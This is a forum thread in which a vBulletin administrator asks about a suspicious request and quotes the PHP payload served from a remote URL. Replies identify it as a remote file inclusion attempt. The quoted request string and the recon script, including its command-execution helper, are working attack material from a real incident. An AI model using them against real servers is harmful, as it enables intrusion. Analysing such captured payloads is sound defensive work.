What is this?


  • What is this?

    Hello

    This is coming up in Who's Online:

    /forum/vbb/index.php/vbgsitemap/vbgsitemap-config.php?base=http://www.hendersonhideaway.net/TNG/cmd.txt?

    When looking up the url it is pointing to in a page snooper I get this:

    <?php

    // Captured payload, quoted as it was served from the URL in the request above.
    // This top-level run only reports on the host: it prints a fixed marker, the OS
    // name, the kernel/uname string, the free disk space of the working directory,
    // and the output of one hard-coded command ("id"). Nothing here writes files or
    // reads request parameters.
    // Fixed marker string; presumably lets the sender tell from the HTTP response
    // whether the payload was executed - TODO confirm against web server logs.
    echo "Mic22";
    // The @ prefix suppresses PHP warnings, so failures leave nothing in the output.
    $dir = @getcwd();
    $ker = @php_uname();
    $OS = @PHP_OS;
    echo "<br>OSTYPE:$OS<br>";
    echo "<br>Kernel:$ker<br>";
    $free = disk_free_space($dir);
    // disk_free_space() returns FALSE on failure; both guards normalise that (and
    // any negative value) to 0 before formatting.
    if ($free === FALSE) {$free = 0;}
    if ($free < 0) {$free = 0;}
    // view_size() and ex() are declared further down in this same script.
    echo "Free:".view_size($free)."<br>";
    // The command is a constant, not attacker-supplied input: the script reports the
    // account the web server process runs as and nothing else.
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    /**
     * Runs $cfe as an operating-system command and returns whatever it printed.
     *
     * Walks a fixed fallback chain - exec, shell_exec, system, passthru, popen -
     * and uses the first one that function_exists() reports (for popen: the first
     * call that yields a resource). Presumably this is meant to cope with hosts
     * where some of these functions are unavailable. Returns '' when $cfe is empty
     * or when no branch applies. Every call is prefixed with @, so a failing
     * branch emits no PHP warning.
     *
     * In the visible script this is called once, with the constant string "id".
     *
     * @param string $cfe Command line to run.
     * @return mixed Captured output; '' if nothing was run.
     */
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    // exec() fills $res with one array element per output line; join them back.
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    // system() writes straight to the output stream, so it is wrapped in an
    // output buffer to capture the text instead of emitting it immediately.
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    // Same buffering approach as the system() branch.
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    // NOTE(review): the loop condition below was mangled by the forum's e-mail
    // obfuscation ("[email protected]") and is not valid PHP as displayed; it
    // presumably was an end-of-file test on $f. Left verbatim as quoted.
    while([email protected]($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    /**
     * Formats a byte count as a short human-readable string.
     *
     * Uses 1024-based thresholds: values of at least 1073741824 are shown in GB,
     * at least 1048576 in MB, at least 1024 in KB, anything smaller in B. The
     * GB/MB/KB figures are rounded to two decimal places.
     *
     * @param mixed $size Byte count.
     * @return string|false Formatted size, or FALSE when $size is not numeric.
     */
    function view_size($size)
    {
    if (!is_numeric($size)) {return FALSE;}
    else
    {
    // round(x*100)/100 keeps two decimals before the unit suffix is appended.
    if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
    elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
    elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
    else {$size = $size . " B";}
    return $size;
    }
    }
    // exit ends the whole request, not just this file: if the script is pulled in
    // by an include, none of the including script's remaining code runs and the
    // response carries only the output printed above.
    exit;

  • #2
    That's PHP code.



    • #3
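      Somebody tried an exploit. The request passes a remote URL in the base parameter of vbgsitemap-config.php, apparently hoping the script will include that URL and run the PHP shown above on the forum's server (a remote file inclusion attempt).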
